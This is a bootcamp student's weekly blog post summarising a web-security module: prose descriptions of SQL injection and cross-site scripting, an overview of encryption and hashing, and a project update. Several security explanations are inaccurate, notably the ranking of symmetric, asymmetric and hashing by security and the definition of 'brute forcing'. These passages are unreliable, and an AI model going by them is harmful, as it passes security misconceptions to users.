It’s Sunday following the 12th week of Tech Elevator’s 14-week coding Bootcamp.
This week Tech Elevator hosted the second and final “Employer Matchmaking” event, and I’ve been putting a lot of time into my passion project. This was the final week of lectures, which focused on web security. Next week we start our two-week Capstone project which will put all of our programming skills to work.
We started our Module on web security learning about some of the most common security risks and how to defend against them; namely SQL injection and cross-site scripting attacks. In a SQL injection attack, the hacker gains access to an application’s database information by passing SQL, which is a database language, into a web request. For example, if an attacker wants all customer data for an online store, they can pose as a customer and send specific SQL queries through one of the store’s web forms in hopes of retrieving more data than the store intended. Cross-site scripting attacks happen when the hacker identifies a vulnerable site and adds front-end scripts, like JavaScript, that can intercept the user’s personal information.
SQL injection and cross-site scripting attacks lead us to a fundamental part of web security; encryption. Most people have heard this term used before, but not everybody knows what it means. Encryption is a blanket term to describe the process of scrambling information to make it unrecognizable before sending it between sources. For example, a good website will encrypt your password before it leaves your browser to reduce the risk of attacks.
There are three common types of encryption; symmetric, assymmetric and hashing. We differentiate between these by discussing the keys. A key is basically a long string of characters used to encrypt and decrypt data when it is passed between the client and the server. Symmetric encryption is the least secure because it uses the same key on both sides. This means the data is protected in transit, but if the attacker has access to either the client or server’s key, it’s useless. The next least-secure type is assymetric encryption. Using assymetric encryption, the client key, often referred to as the public key, is public, but different than the server’s key. The client key scrambles the data, and only the server’s key can unscramble it. Unfortunately this still leaves room for vulnerability since anybody can access the public key. An attacker can still fool the server into thinking they’re somebody else.
The crown jewel of encryption is called hashing. Technically hashing isn’t exactly encryption because it’s one-way. A hash is a string produced by a hashing algorithm. The two main concepts of hashing are (1) the same data entered will always produce the same hash, (2) the hash is impossible to convert back to the data that was originally entered. With hashing, servers don’t store actual passwords, but the hash produced from the passwords. This way, a password entered will produce the same hash every time. You can authenticate users using the hash and if a hacker gains access to the database, the information inside it is useless. The key to hashing is to make sure your hashing algorithm is as sophisticated as possible. Right now, if you’re using a good hashing algorithm, it’s impossible to reverse a hash into the data originally entered programmatically. The industry term for this is “brute forcing.”
As I mentioned earlier, I’ve been working hard on my passion project. If you’re not familiar with the project, read about it in Week 9. I’ve decided to transition the project from a U.S. state-specific tool to a national one. The web site will be called WriteMyRepresentative.com and will be focused on the feature that writes a letter to your congressman based on your answers to survey questions. More details to come.
Thanks for reading! As always, contact me at joeosterfeld@gmail.com with questions.